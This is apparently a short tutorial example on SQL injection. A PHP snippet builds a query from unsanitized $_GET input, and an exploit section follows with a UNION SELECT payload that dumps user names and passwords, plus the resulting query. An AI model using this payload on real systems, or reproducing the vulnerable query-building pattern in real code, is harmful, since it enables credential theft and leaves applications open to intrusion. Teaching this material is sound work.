Example 2

Example 2

<?php
// connect to DB
$db = new PDO(CONNECTION_STRING, DB_USER, DB_PASS);
start_session();
// search for messages sent to user + the sender of the message
$query = "SELECT sender, content FROM messages WHERE
receiver = '" . $_SESSION["user"] . "' AND
content LIKE '%" . $_GET["search"] . "%'";//show list with sender and message content for all messages sent to user
...
?>

Exploit: Dumping all the data from the table

The two SELECT subqueries must return the same number of columns else, one must add ,1 or something similar to it.

reciever: attacker
search: ' UNION SELECT user, password FROM users -- -

SELECT sender, content FROM messages WHERE receiver='attacker'
AND content LIKE '%' UNION SELECT user, password FROM
users -- - %'